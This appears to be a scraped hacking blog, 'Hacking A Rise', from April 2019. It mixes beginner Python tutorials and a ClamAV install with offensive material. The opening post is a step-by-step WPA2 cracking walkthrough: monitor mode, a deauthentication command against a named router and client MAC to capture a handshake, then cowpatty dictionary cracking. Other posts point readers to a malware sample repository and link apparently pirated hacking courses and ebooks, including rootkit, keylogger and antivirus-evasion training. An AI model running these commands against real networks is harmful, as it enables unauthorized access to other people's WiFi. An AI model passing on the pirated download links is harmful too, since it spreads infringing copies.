Tuesday, April 30, 2019

How to use cow-patty for wpa2-psk

welcome back to hacking a rise today we are going to talk about how to use cow patty this method is bruteforce slow and way to gain the password me personally i crack the wps or use a evil twin attack but look people want u know how to hack wifi u need to know all methods and tools not y best idea but look here we are hahahahahaha fuck it

WHAT IS COW PATTY

Implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal). Many enterprise networks deploy PSK-based authentication mechanisms for WPA/WPA2 since it is much easier than establishing the necessary RADIUS, supplicant and certificate authority architecture needed for WPA-Enterprise authentication. Cowpatty can implement an accelerated attack if a precomputed PMK file is available for the SSID that is being assessed.

(tip: use a usb WiFi card )

HOW TO USE

right first we need put the card in to monitor mode so open a terminal and type

airmon-ng start wlan1

Hacking A Rise airmon

Now we start airodump-ng in the simple way this is to scan network signals in the air like hidden wifi signals so open terminal and type

airodump-ng wlan1mon

Hacking A Rise airodump

now we open a new terminal and run airodump-ng on the channel of the target since my target is HUAWEI-B525-FD28 we will be using channel 8 so type and close the other airodump terminal

airodump-ng -c 8 --write HUAWEI-B525-FD28 wlan1mon

Hacking A Rise airodump-ng2

now we have are target wifi so we need to get a handshake so we are going to kick someone of the wifi to force the to sign back in so open new terminal and type this

airplay-ng -o 100 -a E4:0E:EE:B1:FD:28 -c 00:13:E8:21:AF:81 wlan1mon

Hacking A Rise aireplay-ng

when u get the handshake it will pop out on the terminal with airodump-ng running

Hacking A Rise handshake
(Note
you cant crack the wifi with out the handshake )

so now we get to the point were we need to crack the .cap file for the password so now type

cowpatty -r HUAWEI-B525-FD28-03.cap -f wordlist.txt -s HUAWEI-B525-FD28

Hacking A Rise cowpatty

note

this one the slowest methods so dont be saying it dont work that im shit resson been the wordlist u provided did not have the password so there for why i can stress hack the wps to get the wpa2 password check here for the ——> <---------

Thursday, April 25, 2019

Python Tutorial 4 - Installing Modules

Welcome back to another tutorial, today I will be showing you how to install modules and add more functionality to your script.

 

To start, make a new file and import the following

import os

import sys

import time

Once you’ve done that we’re going to install a module called “pyautogui” which allows for simple interfaces as well as mouse and keyboard input.

 

To install it click the “terminal” button near the bottom of pycharm. once you’ve clicked it, it should look something like this

Hacking A Rise Screenshot-86

 

Once you have the terminal open type the following into the console

pip3 install pyautogui

it should start downloading, let it run as it may take some time.

 

after it’s finished installing add the following to the beginning of the file.

import pyautogui

Once you’ve imported pyautogui, we’re going to make a simple program that tells you where the cursor is on the screen.

 

To start I recommend adding the following to the file

time.sleep(10)

This will be more useful once we start making more advanced programs using pyautogui, for now, it just allows you to move the mouse before the actual code runs. Now onto the code that outputs the position of the mouse. Add the following to your code.

print(pyautogui.position())

Now when you run the code it should output the X and Y coordinates of the cursor on your screen.

 

In the next tutorial, I will be showing you how to output that to a dialog box.

 

Previous Tutorial

 

Tuesday, April 23, 2019

Python Tutorial 3 - Simple login

Welcome back to another Python tutorial, In this tutorial, I will show you how to make a simple login using if statements and strings.

 

To start, make a new python file, name it what you like. Once created remember to type the following:

import os

import sys

import time

We won’t be using any of these but we may in a future tutorial. Once that’s typed into the file set your password to your liking by typing:

password = “Example”

Type the password you want where it says “Example”, Make sure you use quotation marks. Proceed by typing the following:

if password == input(“Enter Password:”)

print(“Correct Password”)

The Input() function allows you to type something from the console and then will check if it equal (==) to the password if it is, it will output saying “Correct Password”.

 

In the end, your file should look something like this.Hacking A Rise Screenshot-72

 

In the next tutorial, I will show you how to download new imports.

 

Previous Tutorial

 

Sunday, April 21, 2019

Andrax the future of hacking

Welcome back to hacking a rise today is something Im excited to be telling you about for thos that know me know i love nethunter well its all about to change with the release of andrax last year i think Im not to sure i was set it and told try it and told nethunter looks like a script kiddie to this.

So let me talk a bit about andrax not only is it fucking a simple install it dont need anything to set up just root download install open and let it do its work it offers a manual Vision for android devs to play around with
Portable
Designed to be installed on any Android smartphone, full support from version 5.0 to higher.

Open Source
With open development it is possible to have the support of anyone, this increases the security and efficiency of the system!

Optimized
ANDRAX has been fully developed with a focus on execution with minimal hardware resources.

No emulation
ANDRAX is not an emulation, ANDRAX is an evolution!

More than 700 tools
ANDRAX promotes the use of more than 700 advanced tools for Hacking, Cracking and Penetration Testing.

Over 1000 attacks
Work with real Offensive Security abusing more than 1000 types of attacks with ANDRAX.

not bad for a app

What is ANDRAX

ANDRAX is a penetration testing platform developed specifically for Android smartphones, ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution, But more powerful than a common distribution!

The development of ANDRAX began on 08/09/2016 (DD/MM/YYYY) only for people in Brazil
ANDRAX has been fully redefined and reloaded on 05/10/2018 (DD/MM/YYYY) open to the international public.

ANDRAX is developed by Weidsom Nascimento of The Cracker Technology – Advanced Pentest

Why is Android so powerful?
Simple, everyone has a smartphone and spends all the time with it! We have the possibility to camouflage easily in the middle of everyone, the processor architecture of most Android smartphones is ARM a modern and robust architecture extremely superior to the rest, With touch screens we can run the tools with great agility and take advantage of the graphical interface of Android, we can get in almost anywhere with our smartphones…
credits to andrax

DOWNLOADHERE

My thoughts

well with the way mobile devices are going getting faster more memory and better cpus gpus it wont be a shock if hackers switch to mobiles instead of getting a laptop like i thought kali on a gpd win was good idea but that app is one the best tools to have in your hacking arsenal

Friday, April 19, 2019

Python tutorial 2 - if statements and Strings

Welcome back, in this tutorial you will learn how to use if statements and variables.

 

Start off by creating a new file, name it whatever you wish.

For this program, you don’t need to import anything but I would recommend you

import os

import sys

import time

as it’ll save time in the long run when we work on more advanced programs.

 

A string is something the computer stores

example:Hacking A Rise Screenshot-68

In this example, the string variable1 is storing “Hello World”. you can use this to output something without writing it multiple times.

 

An if statement works by checking something and if it exists it will listen to the following code if it doesn’t exist, it will either end the program or look for an “else” statement.

 

if statement example:Hacking A Rise Screenshot-69

In this example, the computer will output “Hello World” because the if statement is true.

 

 

 

In the next python tutorial, I will be teaching how to set up a simple login interface using if statements, and strings.

 

Previous Tutorial

 

Thursday, April 18, 2019

Python tutorial part 1 - Setting up

In this article, we will be setting up a Python workspace and learning to make a simple program.

To start you need to download python, I recommend you go here as it is the official python website.

After you’ve installed Python, go here to download PyCharm which is what I will be using during these tutorials.

Once PyCharm is installed launch the program and set up a workspace to your liking. Once that is done Create a new project.

Hacking A Rise Screenshot-52

Then choose a name for the project, for this tutorial, I named mine HelloWorld.

Hacking A Rise Screenshot-51

Once you’ve named the project click “Create” this will the new project.

Making a python file

Hacking A Rise Screenshot-53

In the sidebar navigate down to the scripts folder, right-click any file

click New and then Python File. It will ask you to input a name for the file, once you have done so click “OK”

Congratulations you made a Python File, now onto the fun stuff.

Let’s get started

First I usually started with my imports, this includes os, sys, and time.

import os

Import sys

import time

These allow for more functionality in the file.

The Print() function prints anything in quotes in the parentheses to the terminal, this is what we will be learning.

Hacking A Rise Screenshot-56

This is what your file should look like, you have to have quotation marks in the parenthesis or else you will get an error when you run it.

To run the file click Alt+Shift+F10Hacking A Rise Screenshot-58

Then click the file with the name you gave.

It will output to the console saying “Hello World”. Now you may want a delay before it runs the code, this is where the Time import comes in.

The time.sleep() command allows you to pause the code for a set amount of time, If you put a 3 in the parentheses then the code will pause for 3 seconds.

time.sleep(3)

Hacking A Rise Screenshot-60

Now when you run the file it should now take 3 seconds before it says “Hello World”.

This concludes the tutorial for python, I will be making a new tutorial every day, the next tutorial will be about if statements and Strings.

Tuesday, April 16, 2019

How to install the zoo on Kali Linux

welcome to hacking a rise in this one we are install zoo on Kali

What is theZoo.py

theZoo is a project created to make the possibility of malware analysis open and available to the public. Since we have found out that almost all versions of malware are very hard to come by in a way which will allow analysis, we have decided to gather all of them for you in an accessible and safe way. theZoo was born by Yuval tisf Nativ and is now maintained by Shahak Shalev

git clone https://github.com/Hackingriseofficial/theZoo
i forked it so u can install it 🙂

This a old you tube video from my channel

clamav linux antivirus

Well we all know of antivirus for windows but no one really hear of Linux anti virus so in this were going to install clamav for Linux so with out any more chat out my boring arse lets get started by the way im using Kali so the payloads i gen will show up as virus

HOW TO INSTALL

open terminal and type apt-get install clam-av
Hacking A Rise installclamav

let that install

when install i want u to type clamscan
Hacking A Rise clamscan

now we let is scan to scan a dir use the cd command like cd Desktop or documents this will hide the virus in your system
Hacking A Rise scanroot

hope u enjoyed this

Monday, April 15, 2019

network security course

Network Security, WiFi Security, WiFi Hackers, Firewalls, Wire shark, Secure Networking. + Password Managers

What Will I Learn?

An advanced practical skill-set in assuring network security against all threats including – advanced hackers, trackers, exploit kits, Wi-Fi attacks and much more.
In this volume, we take a detailed look at network security.
Become a cyber security specialist.
The very latest up-to-date information and methods.
Discover security vulnerabilities across an entire network, by using network hacking techniques and vulnerability scanning.
You will be able to configure firewalls on all platforms including Windows, MacOS, and Linux for all types of attack scenarios.
Learn to configure and architect a small network for maximum physical and wireless security.
Perform network monitoring to discover and identify potential hackers and malware using tools like Wireshark, Tcpdump, and Syslog.
Understand how we are tracked online by corporations, nation-states your ISP and others.
We look at search engine privacy – we will best understand how to mitigate the tracking and privacy issues of search engines and their associated services.
Understand how to best use methods of authentication including passwords, multi-factor authentication including soft tokens and hard tokens.
What are the best password managers to use and why. How passwords are cracked, and how to mitigate the password attacks.
A certificate of completion is available signed by the instructor Nathan House so CPE credits can be claimed. An off-site sign-up is required to provide your details for this optional certificate.
Requirements

This course is designed for personal and home cyber security, privacy and anonymity. Most of the topics apply in the same way to a business, but the course is delivered as if to an individual for personal cyber security, privacy, and anonymity.
It is recommended that you watch volume 1 of this complete course before watching this volume (2) although it is not required.
Most items referenced in this course are free. But you may elect to purchase additional software, hardware and services discussed in the course. Although It is absolutely not necessary to buy anything to understand and follow the course.
You should have a basic understanding of networking concepts.
Please note this is volume 2 of 4 of the complete course. After the completion of all 4 volumes, you will know more than 80% of security professionals, government and law enforcement agents and even expert hackers about maintaining security, privacy, and anonymity.
Description
Become a cyber security specialist.

After this course, you will be able to discover security vulnerabilities across an entire network, by using network hacking techniques and vulnerability scanning.

You will be able to architect your network for maximum security and prevent local and remote attacks. We also cover the use of custom router firmware to provide you with better network security services.

You will understand the various types of firewalls that are available and what threats each help mitigate.

Including layer 4 firewalls like Ip tables on Linux and PF on Mac OS and BSD. Virtual firewalls, host-based firewalls and application based firewalls like Pfsence. We cover firewalls on all platforms including Windows, Mac OS X and Linux for all types of use scenarios.

We explore in detail wireless security, the configurations that are required for maximum security and why. How Wi-Fi is hacked and how to mitigate those attacks. Covering everything from encryption weaknesses to evil twins, RF isolation, and Wi-Fi crackers.

You will master network monitoring to discover and identify potential hackers, malware and other adversaries that might be lurking on your network. Using tools like Wireshark, Tcpdump and Syslog.

We then move away from network security and onto the details of how we are tracked online by corporations, nation-states your ISP and others. You will understand the techniques used like zombie super cookies, browser fingerprinting and how browser profiling works so third parties can establish who you are online.

We look at search engine privacy – and how to mitigate the tracking and privacy issues of search engines and their associated services.

Browser security – We cover one of the largest risks online, the browser. The doorway into your system. How to best reduce the attack surface of the browser and harden it for maximum security and privacy. A critical consideration for reducing your risk.

Finally you will fully understand how to best use methods of authentication including passwords and multi-factor authentication – soft tokens and hard tokens.

The best password managers to use and why. How passwords are cracked, and how to mitigate the cracking.

This is volume 2 of 4 of your complete guide to cyber security privacy and anonymity.

Who is the target audience?

This course is for anyone who wants to become an expert in security, privacy, and anonymity. This volume covers network security attacking and defending. Online tracking and browser security.
For anyone who would love to gain a practical skill set in mitigating the risk from, malware, Trojans, hackers, trackers, cyber criminals and all online threats.
This course is for anyone who wants to keep their precious files, emails, accounts and personal information out of the hands of the bad guys.
For beginners and intermediate Internet users who are interested in security, safety, and privacy.
For those who want privacy and anonymity online from hackers, corporations and governments.
This course is designed for personal and home Internet security, privacy, and anonymity. Most of the topics apply in the same way to a business, but the course is delivered as if to an individual for personal cyber security, privacy, and anonymity.
Created by Nathan House
Last updated 8/2017
English

Size: 3.14 GB

DOWNLOAD

Computer Hacking_ A beginners guide to computer hacking

A beginners guide to computer hacking, how tohack, internet skills, hacking techniques, and more!

Disclaimer

The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.

DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.

DOWNLOAD HERE

TECHNICAL WHITE PAPER 1 Car Hacking: For Poories

Examining automotive networks for security vulnerabilities is fun and has real world safety implications. From the beginning, we wanted to do something that would allow as many researchers as possible to get involved in this emerging discipline. That is why we released all of our tools and data from our previous research

Disclaimer

The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.

DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded

DOWNLOAD HERE

Sunday, April 14, 2019

Ethical Hacking Career Accelerator Ethical Hacking Bundle

Ethical Hacking on Real Machines : A Complete Hands on Approach to Offensive Ethical Hacking and Pen Testing, Let’s Hack

What Will I Learn?

Do a Complete Black Box Testing
Unleaash the Power of Best Ethical Tools

Hack Real Machines from Lecture 4

Develop Experience to do Real Life Penetration Testing
Requirements
A Try Harder Attitude
Decent Internet Connection
Computer with Minimum 4 GB RAM ( 8 Recommended )
Hardware as we Proceed
Description
Ethical Hacking Career Accelerator is a Special Bundle of Various Ethical Hacking Courses from Different Authors.
We at Proficient School Purchased Exclusive Use Licenses of these courses from authors and made this Program to provide a Quick Head Start for every kind of Security Professional.

If you want to do CEH, OSCP, or any similar Ethical Hacking Exam, We have Ethical Hacking in Offensive Way Course
If you are a Beginner or a Security Professional Looking for Strong Fundamentals, We havePractical Hacking Master Class
If you are already an Senior Ethical Hacker then we have Nessus Professional Crash Course for you.
Note:- We are adding more and more courses to this Program every Month

You will Get Lifetime Access to this On Going Program with Official Certificate from Proficient School for the Completion of these courses, and as their are various Authors in this course, We have Arranged a Dedicated Support Team for you to help you in this journey.

Program Authors:

Gaurav Malhotra – Ethical Hacking in Offensive Way
Sagar Bansal – Practical Hacking Master Class
Jitendra Kumar Singh – Practical Hacking Master Class
Daniel Platt – Practical Hacking Master Class
Wahid Ahmed – Nessus Professional Crash Course
Ahad Ansari – Nessus Professional Crash Course

Legal Disclaimer :

We are not responsible for any of your act which may cause any damage or loss to anyone in anyway.
The Course has No Relation with Offensive Securities, ISC2, E.C.Council or any other Association or Body of Knowledge
We do not claim that this course can replace any official material for any certification
If you think that Authors have sold us something which is making a DMCA Violation, Please Reach us using Udemy Messages and we will take action within 6 hours
Who is the target audience?
This Course is for Students who are Complete Beginner in Ethical Hacking
This Course is for Senior Professionals who want to practice Industry Standard Tools
This course is for students who want to pass Professional Exams and get good jobs in this field
Created by Proficient School
Last updated 9/2018
English

Size: 10.85 GB

Download Here

Masters In Ethical Hacking With Android

making you to control the world on you thumb hacking with android

What Will I Learn?

You will start using android phone for hacking, instead of pc.
Requirements
You shoud know how to use Android Phone.
Description
Do You need to learn ethical hacking,But your not having proper lab setup ? Do you discover the charge line befuddling and scaring?
On the off chance that yes, this is the ideal course for you. concentrating on the viable side of infiltration testing without ignoring the hypothesis behind each attacks.Before hopping into entrance testing, you will initially figure out how to install the required packages to practice penetration testing on your android. All the attacks explained in this course are done in my Android phone.

In the wake of taking this course you will never utilize your computer or laptop for hacking. This is extremely helpful for the individuals who need to begin hacking utilizing there Android Phone without Rooting the Device.

The course is divided into sessions

1.installation of software on android device.

2.commands to used for hacking and pkg setup.
sending a SMS using a command terminal and also making a phone call, basic programming: how to written a simple program in c, c++, python and execute it.

3.penetration testing like:
Metasploit Penetration Testing is a complete guide for beginners as well as security professionals.Social engineer toolkit:SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time.How to break a windows and Linux security by performing different exploitation methods via android. How to performing stress testing through Android.

DDOS attempt to make an online service unavailable by overwhelming it with traffic from multiple source.

Brute force attacking guess the password of victim. SQL MAP automates the discovery and exploitation of vulnerabilities to SQL injection attacks. WEB Application scanning, Creating Phishing page.

UPDATE:-

4.Auxiliary Modules of Meatsploit: Http enum_wayback: this module pulls and parses the urls stored by archive_org for the purpose of replaying during a web assessment. Endpoint_mapper – Scanner DCERPC. Auto-pwn: fingerprint the victim’s browser, then “throw” at it whatever exploits. Email harvesting: search_email_collector which searches google, bing and yahoo for email addresses associated to a particular domain. Detect SSH versions with the SSH version scanner. FTP Version Scanning Metasploit. Heart-bleed vulnerability enables a hacker to trick OpenSSL.

THESE ALL ATTACKS ARE DONE WITHOUT ROOTING THE PHONE

Who is the target audience?

– For beginners and intermediate Internet users?
-This course is for anyone who want to be ethical hacker and penetration testers ?
-who is using android Phone?.

Who is the target audience?
Anyone how want to perform penetration testing on android or windows.
Created by Sac hackken
Last updated 4/2018
English
English [Auto-generated]

Size: 390.69 MB

Download Here

Complete Linux Training Course

Learn how to work Linux like a pro with this free course from udemy

What you’ll learn

By the end of this course you will be a professional Linux administrator and be able to apply for Linux jobs
You will learn almost 150+ Linux commands

You will gain advance Linux systems administration skills and have deep understanding of Linux fundamentals and concepts

You will be able to troubleshoot everyday Linux related issues
You will manage Linux servers in a corporate environment
You will write basic to advance level shell scripts
Requirements
Desire to learn Linux and a computer
Description
Linux is the number ONE operating system for the Corporate Enterprise world.

If you want to start your career in Linux and have little or no knowledge of Linux then I can help. In this course you will learn Linux installation, configuration, administration, troubleshooting, command line, OS tools and much more… I have also included Resume and Interview workshop that will definitely help you get your dream IT job.

In addition to the lectures there will be quizzes, homework and hand-out material just like a live classroom training

I have been teaching this exact course in a classroom environment in New York City. Please note 80% of my students who took this course got the job in Linux within months. Imagine those who take my course only to level up their career, how productive this training can be for them

Following is the list of topics I will cover in this course:

Module 1 – Understanding Linux Concepts

What is Linux?
Everyday use of Linux
Unix vs. Linux
Quiz, Homework and Handouts

Module 2 – Download, Install and Configure

What is Oracle Virtual Box?
Downloading and Installing Oracle Virtual Box
Creating virtual machine
Linux Distributions
Different way to install Linux
Downloading and Installing Linux (CentOS)
Redhat Linux installation (Optional)
Linux Desktop (GUI)
Virtual Machine Management
Linux vs. Windows
Who Uses Linux?
Quiz, Homework and Handouts
Module 3 – System Access and File System

Accessing Linux system
Download and install Putty
Connect Linux VM via Putty
Important Things to Remember in Linux
Introduction to File System
File system structure description
File system navigation commands
File System Paths
Directory listing overview
Creating Files and Directories
Finding Files and Directories (find, locate)
Changing Password
Wildcard (*, $, ^)
Combining and Splitting Files (cat and cut)
Soft and Hard Links (ln)
Quiz, Homework and Handouts

Module 4 – Linux Fundamentals

Commands Syntax
File Permissions (chmod)
File Ownership (chown, chgrp)
Getting Help (man, whatis etc.)
TAB completion and up arrow keys
Adding text to file
Pipes ( | )
File Maintenance Commands
File Display Commands
Filters / Text Processing Commands (cut, sort, grep, awk, uniq, wc)
Compare Files (diff, cmp)
Compress and Un-compress files/directories (tar, gzip, gunzip)
Combining and Splitting Files
Linux vs. Windows Commands
Quiz, Homework and Handouts

Module 5 – System Administration

Linux File Editors (vi text editor)
sed Command
User account management
Switch users and Sudo access
Monitor users
Talking to users (users, wall, write)
Linux Directory Service – Account Authentication
Difference between Active Directory, LDAP, IDM, WinBIND, OpenLDAP etc.
System utility commands (date, uptime, hostname, which, cal, bc etc.)
Processes and schedules (systemctl, ps, top, kill, crontab and at)
Process Management
System Monitoring Commands (top, df, dmesg, iostat 1, netstat, free etc.)
OS Maintenance Commands (shutdown, reboot, halt, init etc.)
Changing System Hostname (hostnamectl)
Finding System Information (uname, cat /etc/redhat-release, cat /etc/*rel*, dmidecode)
System Architecture (arch)
Terminal control keys
Terminal Commands (clear, exit, script)
Recover root Password (single user mode)
SOS Report
Quiz, Homework and Handouts

Module 6 – Shell Scripting

Linux Kernel
What is a Shell?
Types of Shells
Shell scripting
Basic Shell scripts
If-then scripts
For loop scripts
do-while scripts
Case statement scripts
Aliases
Shell History
Command history

Module 7 – Networking, Servers and System Updates

Enabling internet in Linux VM
Network Components
Network files and commands (ping, ifconfig, netstat, tcpdump, networking config files)
NIC Information (ethtool)
NIC or Port Bonding
Downloading Files or Apps (wget)
curl and ping Commands
File Transfer Commands
System updates and repositories (rpm and yum)
System Upgrade/Patch Management
Create Local Repository from CD/DVD
Advance Package Management
SSH and Telnet
DNS
Hostname and IP Lookup (nslookup and dig)
NTP
chronyd (Newer version of NTP)
Sendmail
Apache Web Server (http)
Central Logger (rsyslogd)
Securing Linux Machine (OS Hardening)
OpenLDAP Installation
Quiz, Homework and Handouts

Module 8 – Disk Management and Run Levels

System run levels
Linux Boot Process
Message of the Day
Disk partition (df, fdisk, etc.)
Storage
Logical Volume Management (LVM)
LVM Configuration during Installation
Add Disk and Create Standard Partition
Add Disk and Create LVM Partition
LVM Configuration during Installation
Add Virtual Disk and Create New LVM Partition (pvcreate, vgcreate, lvcreate,)
Extend Disk using LVM
Adding Swap Space
RAID
Quiz, Homework and Handouts

Module 9 – All About Resume

Resume workshop
Cover Letter
Linux job description or duties
Exposure to Other Technologies
Homework and Handouts

Module 10 – All About Interview

IT Components
IT Job Statistics
Linus Around Us
Linux Operating System Jobs
IT Management Jobs
Post Resume and What to Expect
Interview workshop
Join Linux Community
200+ interview questions
Homework
Course Recap

Commands We Have Learned
Don’t Give up
Congratulations
Recap – Handouts
You can reach me at imran_ny@hotmail.com for any questions or concerns

— Imran Afzal

Who this course is for:
Anyone who wants to start a career in Linux
Anyone who wants to have complete Linux training to get a job in IT
Anyone who wants to advance his/her career
Anyone who wants to master the Linux command line skills
Who wants help and advise in resume and interview
Created by Imran Afzal
Last updated 4/2019
English

Download Here

Linux Bash Shell Scripting: Complete Guide

this a course offered by udemy teach’s you to script in bash

What you’ll learn

Be able to create PRO looking script with parameters
Use functions in script

Read files line by line using while loop

Use math in scripts
Be able to decide if value of specific variable is a regular file or a directory
Store commands output into an array
Be able to do decision making based on match with regular expressions
Use SED and AWK to take your scripts into next level
Requirements
Basic knowledge about Linux commands is good to have – but not required
Text editor of your choice (if you just don’t want to watch lectures)
Be able to open a terminal (or git bash if you dont have virtual machine and want to work in Windows environment)
Description
Welcome to Linux bash shell scripting course. I’am Richard and I will be your instructor. I have great knowledge about shell scripting as throughout my career I had been working for Fortune 50 company, where I apart from taking care of 200+ Solaris servers wrote many scripts for keeping live easy ?

What is covered?

Basics of scripting – no worry you don’t know anything about scripting by now
Sha-bang explanation – what it is and why the heck it is called sha-bang
Decision making
Regular expressions
Wildcards
For & While loops
Functions
Reading arguments using CASE structure
…and many more
And what about AWK? Yes, it is covered here! And what about SED? Also covered!

Why I have created this course?

Many years back, when I was starting as UNIX administrator, I had many ideas how to improve specific things using scripts. But, I couldn’t find any good resource, which would take me through all needed topic in one place. Somewhere I got great explanation about sha-bang while regular expressions for shell scripting were only mentioned. Somewhere was good explanation about decision making in if statement, but SED and AWK part was missing, and that use of SED and AWK was in my carrer really important. Basically I cannot imagine any single production script, where I wouldn’t used SED or AWK, because without them you are not able to create that “magic” in your script.

Many years later, I am here to share in one place what is really needed in order to create magic script. Not only how to create script, do some decision making in if statements, write functions, use arrays, but mainly how to combine everything including AWK and SED. I was creating this course in a way, which would help me a lot to create great scripts during start of my career. All needed things in one place.

Please, watch my preview lectures to see what we are going to build in this course.

Who this course is for:
Everyone who wants to dive into shell scripting
Experienced users who would like to take their knowledge to next level wit AWK and SED
Created by Richard Böhm
Last updated 2/2019
English

Download Here

Friday, April 12, 2019

THE CAR HACKERS HANDBOOK PDF

The Car Hacker’s Handbook will give you a deeper understanding of the computer systems and embedded software in modern Vehicles. It begins by examining vulnerabilities and providing detailed explanations of communications over the CAN bus and Between devices and systems.

Then, once you have an understanding of a Vehicles communication network, you’ll learn how to Intercept data and perform specific hacks to track vehicles, unlock doors, glitch engines, flood communication, and more. With a focus on low-cost, open source hacking tools such as Metasploit, Wireshark, Kayak, can-utils, and CHIP Whisperer, The Car Hackers Handbook will show you how to:

Build an accurate threat model for your vehicle
Reverse engineer the CAN bus to fake engine signals
Exploit vulnerabilities in diagnostic and data-logging systems
Hack the ECU and other firmware and embedded systems
Feed exploits through infotainment and vehicle-to-vehicle communication systems
Override factory settings with performance-tuning techniques
Build physical and virtual test benches to try out exploits safely

Disclaimer

The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.

DMCA take down

DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.

DOWNLOAD HERE

Rootkits and Stealth Apps Creating & Revealing full course

Complete guide to rootkit and stealth software development. Practical ROOTKIT HACKING 101

What you’ll learn

Over 30 lectures and 10 hours of content!
Lectures in PDF + Live Video Training

Free source code package to download

How to create shellcode
How to inject code
How to hide processes, files, directories and registry entries
How to keep a rootkit in a system
How to create a backdoor
How to create an invisible keylogger and remote console
How to make a screenshot
Creating undetectable applications
How to deceive Anti-Virus applications
How to use anti-emulation techniques
How to bypass a firewall
How to create a rootkit detector
How to protect against rootkits
Requirements
interest in ITsec and ethical hacking
some IT and programming basics (C/C++)
Description
LAST UPDATED: 12/2018

Rootkits and Stealth Apps: Creating & Revealing 2.0 HACKING

Ethical Hacking in Practice. Complete guide to rootkit and stealth software development. Practical ROOTKIT HACKING 101

Before we begin: the practical use of the course you are going to see has been proven by thousands of people all over the world – beginners and computer geeks as well. People who make their first steps in computer / network security and professionals: network administrators, programmers, pentesters, black- and white hat hackers. Please, read carefully what we’d like to share with you.

A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer. – definition by Wikipedia

You can ignore the fact that rootkits really exist,
You can pretend that goverment agencies don’t use rootkits,
You can even believe that big companies don’t spend huge amount of money for developing malicious software that can spy on you and your family,
You can just turn a blind eye on it and ignore these fact.
But it does not make the problem disappear.

Therefore we decided to face facts and show you how rootkits work, how they can hide inside your system, how to create such an invisible software, how to detect and protect against those threats.

This course covers all the important techniques related with ROOTKITS AND CREATING INVISIBLE SOFTWARE used by hackers, system administrators, pentesters and IT forensic analysts.

What you can expect from this course:

You’ll learn how to create shellcode
You’ll learn how to inject code into processes
You’ll learn how to hide processes, files, directories and registry entries
You’ll learn how to keep a rootkit in a system
You’ll learn how to create a backdoor
You’ll learn how to create an invisible keylogger and remote console
You’ll learn how to make a screenshot
You’ll learn how to create undetectable applications
You’ll learn how to deceive Anti-Virus applications
You’ll learn how to use anti-emulation techniques
You’ll learn how to bypass a firewall
You’ll learn how to create a rootkit detector
You’ll learn how to protect against rootkits
And many other interesting topics

We guarantee your 100% satisfaction or you will get your money back. You have 30 days to decide if this course is for you. You will get access to the whole system. If for any reason you’re not satisfied with your training, you will get a full refund. No questions asked.

Good luck and see you on the other side,
Andrew Harper || ITsec Academy || Hacking School Team

Who this course is for:
students interested in rootkit development
ethical hackers
system and network administrators
everyone interested in ethical hacking in general
ISA CISS, CEH, CISSP, MCSE, CCNA
Created by Hacking School, IT Security Academy

English
Size: 951.07 MB

DOWNLOAD HERE

Learning Kali Linux

Disclaimer

The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.

DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.

Download here: https://mega.nz/#!PzZRTC7C!gwQBwU197-_-gGqMjLF8UOf770cld9fn5aGYQiwpWRA

Thursday, April 11, 2019

hack computer systems like black hat

What you’ll learn
130+ ethical hacking & security videos
Start from scratch up to a high-intermediate level
Learn what is ethical hacking, its fields and the different types of hackers

Install hacking lab & needed software (works on Windows, OS X and Linux)
Hack & secure both WiFi & wired networks
Discover vulnerabilities & exploit them hack into servers
Hack secure systems using client-side and social engineering attacks
Use 30+ hacking tools such as Metasploit, Aircrack-ng, SQLmap…..etc
Understand how websites work, how to discover and exploit web application vulnerabilities to gain full control over websites
Secure systems from all the attacks shown
Install Kali Linux – a penetration testing operating system
Install windows & vulnerable operating systems as virtual machines for testing
Learn linux basics
Learn linux commands and how to interact with the terminal
Learn Network Penetration Testing
Network basics & how devices interact inside a network
A number of practical attacks that can be used without knowing the key to the target network
Control connections of clients around you without knowing the password.
Create a fake Wi-Fi network with internet connection & spy on clients
Gather detailed information about clients and networks like their OS, opened ports …etc.
Crack WEP/WPA/WPA2 encryptions using a number of methods.
ARP Spoofing/ARP Poisoning
Launch Various Man In The Middle attacks.
Gain access to any account accessed by any client in your network.
Sniff packets from clients and analyse them to extract important info such as: passwords, cookies, urls, videos, images ..etc.
Discover open ports, installed services and vulnerabilities on computer systems
Gain control over computer systems using server side attacks
Exploit buffer over flows and code execution vulnerabilities to gain control over systems
Gain control over computer systems using client side attacks
Gain control over computer systems using fake updates
Gain control over computer systems by backdooring downloads on the fly
Create undetectable backdoors
Backdoor normal programs
Backdoor any file type such as pictures, pdf’s …etc.
Gather information about people, such as emails, social media accounts, emails and friends
Use social engineering to gain full control over target systems
Send emails from ANY email account without knowing the password for that account
Read, write download, upload and execute files on compromised systems
Capture keystrokes on a compromised system
Use a compromised computer as a pivot to gain access to other computers on the same network
Understand how websites & web applications work
Understand how browsers communicate with websites
Gather sensitive information about websites
Discover servers, technologies and services used on target website
Discover emails and sensitive data associated with a specific website
Find all subdomains associated with a website
Discover unpublished directories and files associated with a target website
Find all websites hosted on the same server as the target website
Exploit file upload vulnerabilities & gain full control over the target website
Discover, exploit and fix code execution vulnerabilities
Discover, exploit & fix local file inclusion vulnerabilities
Discover, fix, and exploit SQL injection vulnerabilities
Bypass login forms and login as admin using SQL injections
Writing SQL queries to find databases, tables and sensitive data such as usernames and passwords using SQL injections
Read / Write files to the server using SQL injections
Learn the right way to write SQL queries to prevent SQL injections
Discover reflected XSS vulnerabilities
Discover Stored XSS vulnerabilities
Hook victims to BeEF using XSS vulnerabilities
Fix XSS vulnerabilities & protect yourself from them as a user
Requirements
Basic IT Skills
No Linux, programming or hacking knowledge required.
